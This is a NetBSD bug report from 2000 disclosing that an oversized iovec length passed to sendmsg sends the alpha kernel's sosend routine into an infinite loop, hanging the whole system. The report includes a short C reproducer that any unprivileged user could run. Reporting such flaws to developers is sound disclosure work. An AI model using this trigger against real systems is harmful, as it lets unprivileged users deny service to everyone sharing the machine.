Subject: kern/10070: sendmsg syscall may hang system on alpha
To: None <>
From: None <>
List: netbsd-bugs
Date: 05/08/2000 05:28:11
>Number:         10070
>Category:       kern
>Synopsis:       sendmsg syscall may hang system on alpha
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    kern-bug-people
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Mon May 08 05:29:00 PDT 2000
>Originator:     Juergen Weiss
>Release:        1.4.2
Universitaet Mainz
NetBSD netadmin.zdv.Uni-Mainz.DE 1.4.1 NetBSD 1.4.1 (LOCAL) #0: Mon Aug 16 18:27:14 MEST 1999     root@netadmin.zdv.Uni-Mainz.DE:/usr/src/sys/arch/alpha/compile/LOCAL alpha

Certain args to the sendmsg system call lead to an infinite
loop in the sosend kernel subroutine. Result is, that the system 
hangs - that is the process does not give up control, so no
process switching occurs. Any user can trigger this, no special
privs required.
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/uio.h>


     int sd;
     struct sockaddr_in addr;
     struct msghdr msg;
     struct iovec msg_iov;
     char buf[1000];

     bzero(&msg_iov, sizeof(msg_iov));
     msg_iov.iov_base = buf;
     msg_iov.iov_len = 4294967368;

     bzero(&msg, sizeof(msg));
     msg.msg_iov = &msg_iov;
     msg.msg_iovlen = 1;

     addr.sin_family = AF_INET;
     addr.sin_port = htons(21);
     addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
     sd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
     if (sd < 0)
         perror("socket err");
     if (connect(sd, &addr, sizeof(addr)) < 0)
     sendmsg(sd, &msg, 0);